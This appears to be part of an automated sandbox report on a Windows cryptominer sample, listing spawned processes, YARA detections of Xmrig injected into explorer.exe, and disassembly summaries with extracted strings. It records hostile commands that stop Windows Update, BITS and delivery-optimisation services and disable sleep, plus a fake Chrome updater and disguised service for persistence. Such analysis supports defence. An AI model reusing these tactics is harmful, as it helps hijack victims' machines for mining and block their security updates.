                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:44
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:45
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:46
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop bits
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:47
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:48
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:49
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:50
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                        Imagebase:0x7ff63f640000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:51
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                        Imagebase:0x7ff63f640000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:52
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:53
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                        Imagebase:0x7ff63f640000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:54
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:55
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                        Imagebase:0x7ff63f640000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:56
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:57
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:58
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:59
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:explorer.exe
                                        Imagebase:0x7ff674740000
                                        File size:5'141'208 bytes
                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000003.2189751609.0000000001118000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000003.2189751609.0000000001109000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000002.4507671698.0000000001118000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000002.4507448971.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000003.3457810885.0000000001118000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000002.4507671698.000000000117A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000002.4507448971.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000003B.00000002.4507448971.00000000010E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        Has exited:false

                                        Target ID:62
                                        Start time:21:03:46
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\svchost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                        Imagebase:0x7ff7e52b0000
                                        File size:55'320 bytes
                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                        Has elevated privileges:true
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                          Execution Graph

                                          Execution Coverage:2.4%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:10.6%
                                          Total number of Nodes:850
                                          Total number of Limit Nodes:2
                                          execution_graph: [serialized node/edge data of the interactive execution graph view; it lists function addresses in the 0x140001000 range and the API calls they reach, among them VirtualProtect, VirtualQuery, NtSetTimer2, malloc, memcpy, wcscpy/wcscat/wcslen, EnterCriticalSection/LeaveCriticalSection, TlsGetValue, SetUnhandledExceptionFilter, signal, _initterm, __set_app_type and __setusermatherr; the graph itself is not rendered in this export]

                                          Callgraph


                                          Control-flow Graph

                                          APIs
                                          • NtSetTimer2.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                          Memory Dump Source
                                          • Source File: 00000039.00000002.4507175085.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 00000039.00000002.4507091616.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507212174.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507283102.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507326460.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_57_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: Timer2
                                          • String ID:
                                          • API String ID: 3765539487-0
                                          • Opcode ID: 2826bf933b6c05314846991301916adf57e49d07940debb5eab16ace37e77d14
                                          • Instruction ID: 35ac0efe93fe85c119e55826d4317f241f31154ff2ae5808118bfd6961f8b30b
                                          • Opcode Fuzzy Hash: 2826bf933b6c05314846991301916adf57e49d07940debb5eab16ace37e77d14
                                          • Instruction Fuzzy Hash: B5F09DB2608B408AEA12DB52F89579A77A0F38D7C0F00991ABBC843735DB38C190CB40
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000039.00000002.4507175085.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 00000039.00000002.4507091616.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507212174.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507283102.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507326460.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_57_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: wcslen$wcscatwcscpy
                                          • String ID: $ $ImagePath$PROGRAMDATA=$SYSTEMROOT=$Start$\??\$\??\$\BaseNamedObjects\irgetnfcwnlzcjjx$\BaseNamedObjects\nbpdgpttumpbrvsggtyhzzki$\BaseNamedObjects\oihkhofwnelue$\Google\Chrome\updater.exe$\Registry\Machine\SYSTEM\CurrentControlSet\Services\GoogleUpdateTaskMachineQC$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\sc.exe
                                          • API String ID: 295340062-1204649063
                                          • Opcode ID: 84489d52dc6eabb1d20f0ef85d9b4e50c601852e4457ff161c3aa2df161eabe2
                                          • Instruction ID: 63998e305b8756a5e3452f834d5d1cbc286363a7c0fb3ee0574469475c343858
                                          • Opcode Fuzzy Hash: 84489d52dc6eabb1d20f0ef85d9b4e50c601852e4457ff161c3aa2df161eabe2
                                          • Instruction Fuzzy Hash: B02329F1524BC198F723CB2AF8467E56360BB9E3C8F445215FB84676B6EB798285C304

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000039.00000002.4507175085.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 00000039.00000002.4507091616.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507212174.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507283102.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507326460.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_57_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: wcslen$wcscatwcscpywcsncmp
                                          • String ID: 0$X$\BaseNamedObjects\nbpdgpttumpbrvsggtyhzzki$`
                                          • API String ID: 597572034-1884934463
                                          • Opcode ID: 97d98fd1f8f26b2f6adaa190693670e5aa8e9adce9169d4d44e2208dc3c15a9e
                                          • Instruction ID: 7ef851f8f8bfc735060d7e834e9c65a72f2dfc4ff847d9955ee94b9ea182b1ed
                                          • Opcode Fuzzy Hash: 97d98fd1f8f26b2f6adaa190693670e5aa8e9adce9169d4d44e2208dc3c15a9e
                                          • Instruction Fuzzy Hash: 011259B2608B8081E762CB16F8443EAB7A4F789794F414215EBA957BF5DF7CC189C700

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000039.00000002.4507175085.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 00000039.00000002.4507091616.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507212174.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507283102.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507326460.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_57_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                          • String ID:
                                          • API String ID: 2643109117-0
                                          • Opcode ID: 5ca3ecd3b8f5a2a492a9a5c1193d787b93bdfe1a80292afba9e010da7a34cac9
                                          • Instruction ID: 463d8eadf6764cf81835e2f5447ee9fd2fbaf236c41788732bd38f3ca502ba48
                                          • Opcode Fuzzy Hash: 5ca3ecd3b8f5a2a492a9a5c1193d787b93bdfe1a80292afba9e010da7a34cac9
                                          • Instruction Fuzzy Hash: 5A5123B1611A4085FB16EF27F9947EA27A5AB8D7D0F849121FB4D873B6DE38C4958300

                                          Control-flow Graph

                                          APIs
                                          • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C98,0000000140007C98,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                          • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C98,0000000140007C98,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                          • memcpy.MSVCRT ref: 0000000140001CE0
                                          • GetLastError.KERNEL32(?,?,?,?,0000000140007C98,0000000140007C98,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000039.00000002.4507175085.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 00000039.00000002.4507091616.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507212174.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507283102.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507326460.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_57_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                          • API String ID: 2595394609-2123141913
                                          • Opcode ID: e517ed0b8cdf57a22d67b328a99ff54f7bc18a125c4613c36cab77cbedee8045
                                          • Instruction ID: 5c7ee5ee1b8a04923d5a96a0df04d384374ee326a967495c8333b08c7993e382
                                          • Opcode Fuzzy Hash: e517ed0b8cdf57a22d67b328a99ff54f7bc18a125c4613c36cab77cbedee8045
                                          • Instruction Fuzzy Hash: 294143F1601A4586FA26DF47F884BE927A0E78DBC4F554126EF0E877B1DA38C586C700

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000039.00000002.4507175085.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 00000039.00000002.4507091616.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507212174.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507283102.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507326460.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_57_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                          • String ID:
                                          • API String ID: 926137887-0
                                          • Opcode ID: f2f02a323082eb92972feb3cd2d3233a2b516d0287600d84264fd9060dbe8c55
                                          • Instruction ID: 85fbb11ae3983d049e5aa99e15e4bef804ab9b98c2283f83d64eac87ba6817d4
                                          • Opcode Fuzzy Hash: f2f02a323082eb92972feb3cd2d3233a2b516d0287600d84264fd9060dbe8c55
                                          • Instruction Fuzzy Hash: 9221E3B0705A0292FA5BEB53F9583E92360B76CBD0F444021FB1E476B4DB7A8986C300

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000039.00000002.4507175085.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 00000039.00000002.4507091616.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507212174.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507283102.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507326460.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_57_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CCG
                                          • API String ID: 0-1584390748
                                          • Opcode ID: 112abc6df4a3a955ea7a6242a2a3ec18b1e193b9e50968186ba58eaa7180ca05
                                          • Instruction ID: 838ee2c544bf2803730cc930bbb0f4a86f91135578be0a2b6e08d954fec56f6a
                                          • Opcode Fuzzy Hash: 112abc6df4a3a955ea7a6242a2a3ec18b1e193b9e50968186ba58eaa7180ca05
                                          • Instruction Fuzzy Hash: A72159B1A0110642FA77DA1BB5943FA1182ABCD7E4F258535BF1A473F9DE3C88828241

                                          Control-flow Graph

                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000039.00000002.4507175085.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 00000039.00000002.4507091616.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507212174.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507283102.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507326460.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_57_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                          • API String ID: 544645111-395989641
                                          • Opcode ID: ee5502d3effd7a536878bdf8aefb10f3e022fdfcb9b8ee8412db7f6aa0d5b7eb
                                          • Instruction ID: 5534edb58951571e9cddb68e2d52a890a1341d8cf7b14363ea8337f027b41872
                                          • Opcode Fuzzy Hash: ee5502d3effd7a536878bdf8aefb10f3e022fdfcb9b8ee8412db7f6aa0d5b7eb
                                          • Instruction Fuzzy Hash: 215114B6B11544DAEB12CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000039.00000002.4507175085.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 00000039.00000002.4507091616.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507212174.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507283102.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507326460.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_57_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: fprintf
                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                          • API String ID: 383729395-3474627141
                                          • Opcode ID: 577444ae89d5f5a6c95c3a2f675773f7031f896e683781332b98d4dce8e5709a
                                          • Instruction ID: a02188ec0087b42d3f25a0ad686d1475033a3de64a4a15f6bec79cad075d9a0b
                                          • Opcode Fuzzy Hash: 577444ae89d5f5a6c95c3a2f675773f7031f896e683781332b98d4dce8e5709a
                                          • Instruction Fuzzy Hash: 1DF09671A14A4482E612EF6AB9417ED6360E75D7C1F50D211FF4D576A5DF3CD182C310

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000039.00000002.4507175085.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                          • Associated: 00000039.00000002.4507091616.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507212174.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507283102.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                          • Associated: 00000039.00000002.4507326460.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_57_2_140000000_conhost.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                          • String ID:
                                          • API String ID: 682475483-0
                                          • Opcode ID: 6aed334ba28e281145827aad8106e07ad7f1f3d084932f70a39d4ad6c8ab7699
                                          • Instruction ID: fd5d896073a876b2497a5a253350f949cfb4402a0739e06ef74f700dacb1e49b
                                          • Opcode Fuzzy Hash: 6aed334ba28e281145827aad8106e07ad7f1f3d084932f70a39d4ad6c8ab7699
                                          • Instruction Fuzzy Hash: 0801AFB5705A0192FA5BDB53FE083E86260B76CBD1F454021EF0953AB4DB798996C200